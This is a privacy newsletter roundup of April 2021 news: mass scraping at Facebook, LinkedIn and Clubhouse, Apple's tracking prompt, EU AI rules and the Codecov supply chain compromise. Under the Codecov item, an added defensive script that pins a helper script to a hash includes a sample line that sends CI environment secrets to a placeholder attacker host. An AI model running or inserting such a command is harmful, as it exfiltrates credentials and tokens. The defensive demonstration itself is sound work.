Privacy Roundup #0177 • April 2021

April 2021 was dominated by mass data scraping at Facebook, LinkedIn and Clubhouse, fresh regulatory pressure from Apple and Brussels, and rare government moves into private servers and the surveillance market.

1. Phone numbers of 533 million Facebook users posted to a hacker forum

A dataset holding the phone numbers, names and other profile details of 533 million Facebook users appeared for free on a low level hacking forum. Facebook said the information had been scraped through a contact importer flaw it had closed in 2019, but the records remained useful for phishing and account takeover.

www.bleepingcomputer.com

2. Ireland opens a GDPR inquiry into the Facebook leak

The Irish Data Protection Commission launched an own volition inquiry into the leaked dataset under the GDPR and the Data Protection Act 2018. The regulator noted that Facebook had not told it about the underlying flaw when the company found and fixed the issue in 2019.

techcrunch.com

3. Scraped data on 500 million LinkedIn profiles offered for sale

A seller on a hacking forum advertised an archive built from roughly 500 million LinkedIn profiles, including names, email addresses, phone numbers and workplace details. LinkedIn said the data had been scraped from public profiles and aggregated from other sources rather than taken in a system breach.

news.linkedin.com

4. Personal records of 1.3 million Clubhouse users dumped online

An SQL database with 1.3 million scraped Clubhouse user records, including user IDs, names, handles and the identity of the person who invited them, was posted for free on a hacker forum. Clubhouse said its systems had not been breached and that the data had been pulled from its API, which exposed public profile information to anyone with a token.

cybernews.com

5. Apple's App Tracking Transparency arrives in iOS 14.5

Apple shipped App Tracking Transparency, which forces apps to ask permission before tracking users across other apps and websites. A refusal cuts off access to the advertising identifier that brokers and ad networks relied on, upending the mobile tracking economy.

www.eff.org

6. FBI deletes Hafnium web shells from privately owned Exchange servers

Acting on a court order from a Texas judge, the FBI accessed privately owned Microsoft Exchange servers and deleted web shells left behind by the Hafnium intrusions. The operation copied and removed the backdoors but did not patch the servers or notify owners in advance, an unusual reach into private systems.

www.bleepingcomputer.com

7. Signal's chief turns the tables on police phone cracking firm Cellebrite

Signal founder Moxie Marlinspike published an analysis showing serious flaws in Cellebrite software used by police to extract data from seized phones. He argued that a crafted file placed on a device could corrupt Cellebrite reports, casting doubt on evidence the tool produces.

www.bleepingcomputer.com

8. Europe proposes its first rules on artificial intelligence and biometric surveillance

The European Commission published a draft Artificial Intelligence Act that would restrict high risk systems and limit real time facial recognition in public spaces. Civil liberties groups argued the carve outs for law enforcement still left room for mass biometric surveillance.

techcrunch.com

9. Geico admits fraudsters scraped customers' driver's licence numbers

Geico disclosed that attackers had exploited its online quote system to steal customers' driver's licence numbers over several weeks. The insurer warned that the stolen numbers could be used to file fraudulent unemployment claims in victims' names.

techcrunch.com

10. Codecov discloses a months long supply chain compromise

Codecov revealed that an attacker had quietly altered its Bash Uploader script, which customers typically fetched and executed directly inside their CI jobs, so that it sent the contents of the build environment, including any credentials, tokens and keys held in environment variables, to a server the attacker controlled. The tampering began at the end of January and was only discovered on 1 April; it affected thousands of organisations, including several well known software firms.

www.rapid7.com
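The defence Codecov itself pointed customers to afterwards was to check the uploader against its published SHA-256 digest before running it, rather than piping whatever the server returns straight into a shell. The script below is an added example written for this roundup, not Codecov's code or the newsletter's: it pins a helper script to a reviewed digest, refuses to execute it on mismatch, and demonstrates the attack class with a constructed "uploader" that gains one exfiltration line. The uploader contents, the pinned digest and the attacker host name are all constructed placeholders.

```shell
#!/bin/sh
# Added example (not Codecov's code): pin a third-party CI helper script to a
# reviewed SHA-256 digest and refuse to execute it if the digest changes.
# The "uploader" script, the digest pin and the attacker host are constructed.

# Print the SHA-256 hex digest of a file; portable across coreutils and macOS.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | awk '{print $1}'
  else
    openssl dgst -sha256 "$1" | awk '{print $NF}'
  fi
}

# verify_script FILE EXPECTED_DIGEST -> succeeds only if the digests match.
verify_script() {
  actual=$(sha256_of "$1")
  [ "$actual" = "$2" ]
}

# verify_and_run FILE EXPECTED_DIGEST -> executes FILE only after verification.
# This replaces the `bash <(curl -s https://example/script)` pattern, which runs
# whatever the hosting server returns, tampered or not.
verify_and_run() {
  if verify_script "$1" "$2"; then
    sh "$1"
  else
    echo "refusing to run $1: SHA-256 mismatch (expected $2, got $(sha256_of "$1"))" >&2
    return 1
  fi
}

# Write the constructed clean uploader into DIR and return its pinned digest.
write_clean_uploader() {
  printf '%s\n' '#!/bin/sh' 'echo "uploading coverage report"' > "$1/uploader.sh"
  sha256_of "$1/uploader.sh"
}

# Happy path: the script matches the digest the team reviewed, so it runs.
demo_pinned_script_runs() {
  dir=$(mktemp -d) || return 1
  pin=$(write_clean_uploader "$dir")
  verify_and_run "$dir/uploader.sh" "$pin" >/dev/null
  rc=$?
  rm -rf "$dir"
  return $rc
}

# Attack path: the hosted copy gains a line that ships the CI environment
# (tokens, keys) to an attacker host. The digest no longer matches, so nothing
# executes. Returns 0 if the tampered copy was rejected, 1 if it ran.
demo_tampered_script_rejected() {
  dir=$(mktemp -d) || return 1
  pin=$(write_clean_uploader "$dir")
  # Hypothetical exfiltration line; attacker.invalid is a placeholder host.
  printf '%s\n' 'curl -s -d "$(env)" https://attacker.invalid/collect' >> "$dir/uploader.sh"
  if verify_and_run "$dir/uploader.sh" "$pin" 2>/dev/null; then
    rm -rf "$dir"
    return 1
  fi
  rm -rf "$dir"
  return 0
}

demo_pinned_script_runs && demo_tampered_script_rejected \
  && echo "pinning works: clean script ran, tampered copy was rejected"
```

The pin has to live in the repository alongside the CI config, and updating it should be a reviewed change like any other dependency bump; a pin that is re-fetched from the same server that hosts the script verifies nothing. Pinning also does nothing about secrets that are still exposed to the script once it runs, so long-lived tokens in CI environment variables deserve the same scrutiny.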

11. Millions of dormant Pentagon IP addresses suddenly come alive

Minutes before the change of administration, an obscure Florida firm with no track record began announcing tens of millions of unused Defence Department IP addresses. The Pentagon later said it was assessing the address space for vulnerabilities, but could not explain why it chose that company.

www.washingtonpost.com

12. Experian API exposed the credit scores of most Americans

A researcher found that a lender's website let anyone look up an Experian credit score by supplying only a name and postal address. The exposed API also returned risk factors, and the researcher feared the same flawed integration was in use across many other companies.

krebsonsecurity.com

13. ParkMobile breach exposes data on 21 million app users

Account details for 21 million users of the parking app ParkMobile, including email addresses, dates of birth, phone numbers and licence plate numbers, went up for sale on a Russian language crime forum. ParkMobile said the passwords taken were encrypted and that the keys needed to read them had not been accessed.

krebsonsecurity.com

14. Senators introduce the Fourth Amendment Is Not For Sale Act

A bipartisan group of lawmakers introduced a bill to bar police and intelligence agencies from buying location and other data from brokers without a court order. The measure aimed to close a loophole that let agencies sidestep warrant requirements by purchasing information on the open market.

techcrunch.com

15. EFF launches a tool to check whether Chrome has joined Google's FLoC trial

The Electronic Frontier Foundation released Am I FLoCed, a site that tells visitors whether Google had enrolled their browser in its Federated Learning of Cohorts advertising experiment. Google had begun the trial on millions of Chrome users without asking for consent, and rival browsers moved to block the system.

www.eff.org

16. Reverb data breach exposes musicians' personal details

The musical instrument marketplace Reverb began notifying customers after a researcher found an unsecured database holding more than five million records. The exposed information included names, postal addresses, phone numbers and email addresses of buyers and sellers.

www.bleepingcomputer.com

17. France's top administrative court waters down EU surveillance limits

The Conseil d'Etat ruled on bulk telecommunications data retention in a way that let the French state keep retaining data indiscriminately. Digital rights groups said the decision sidestepped binding judgments of the Court of Justice of the European Union on mass surveillance.

edri.org

18. Indian brokerage Upstox confirms a breach of customer data

The trading platform Upstox disclosed that attackers had accessed sensitive customer information, including names, dates of birth, addresses and bank account details. Passwords had been stored as bcrypt hashes, but the breach still exposed extensive financial and identity data on more than a hundred thousand users.

haveibeenpwned.com

19. Eversource exposes data on thousands of utility customers

The New England utility Eversource disclosed that a misconfigured cloud storage server had left customer files open to potential public access. The exposed records included names, addresses and Social Security numbers for thousands of customers.

www.bleepingcomputer.com

20. Delhi High Court lets India's competition regulator probe WhatsApp's new privacy policy

A single judge of the Delhi High Court dismissed petitions from WhatsApp and Facebook that sought to halt a Competition Commission of India inquiry into the revised privacy policy. The court found no merit in the challenge and allowed the regulator to examine whether the data sharing terms abused WhatsApp's dominant market position.

www.livelaw.in
